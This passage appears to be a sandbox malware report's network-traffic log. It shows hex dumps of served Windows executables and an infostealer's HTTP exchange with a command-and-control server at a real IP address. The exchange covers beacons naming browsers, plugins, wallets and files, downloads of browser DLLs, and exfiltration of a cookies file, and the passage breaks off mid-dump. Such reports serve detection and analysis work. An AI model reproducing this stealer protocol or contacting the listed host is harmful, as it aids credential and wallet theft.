00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 13:02:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 13:02:40 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.231.69.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDAFHDHCBFIDGCFIDGHost: 185.231.69.191Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 38 46 43 31 33 33 35 30 45 30 31 36 37 31 32 32 37 33 30 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 2d 2d 0d 0a Data Ascii: ------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="hwid"5A8FC13350E01671227304------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="build"LogsDiller------IEHDAFHDHCBFIDGCFIDG--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIDGHDBAFIJJJJKJDHDHost: 185.231.69.191Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 2d 2d 0d 0a Data Ascii: ------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="message"browsers------BFIDGHDBAFIJJJJKJDHD--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 185.231.69.191Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="message"plugins------IJDHDGDAAAAKFIDGHJDG--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBHost: 185.231.69.191Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 2d 2d 0d 0a Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="message"fplugins------IDAKJKEHDBGHIDHIEHDB--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAKHost: 185.231.69.191Content-Length: 6359Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/sqlite3.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDGHost: 185.231.69.191Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------DBKKFCBAKKFBGCBFHJDG--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECBFCGIEGCBGCAECGCHost: 185.231.69.191Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 43 42 46 43 47 49 45 47 43 42 47 43 41 45 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 42 46 43 47 49 45 47 43 42 47 43 41 45 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 42 46 43 47 49 45 47 43 42 47 43 41 45 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 42 46 43 47 49 45 47 43 42 47 43 41 45 43 47 43 2d 2d 0d 0a Data Ascii: ------KKECBFCGIEGCBGCAECGCContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------KKECBFCGIEGCBGCAECGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKECBFCGIEGCBGCAECGCContent-Disposition: form-data; name="file"------KKECBFCGIEGCBGCAECGC--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCHost: 185.231.69.191Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="file"------GCGHJEBGHJKEBFHIJDHC--
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/freebl3.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/mozglue.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/msvcp140.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/nss3.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/softokn3.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/vcruntime140.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAKHost: 185.231.69.191Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAFHost: 185.231.69.191Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 2d 2d 0d 0a Data Ascii: ------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="message"wallets------JJKEBGHJKFIDGCAAFCAF--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFHost: 185.231.69.191Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 2d 2d 0d 0a Data Ascii: ------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="message"files------FHCAEGCBFHJDGCBFHDAF--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIIDAEBGCAAECAKFHIIHost: 185.231.69.191Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 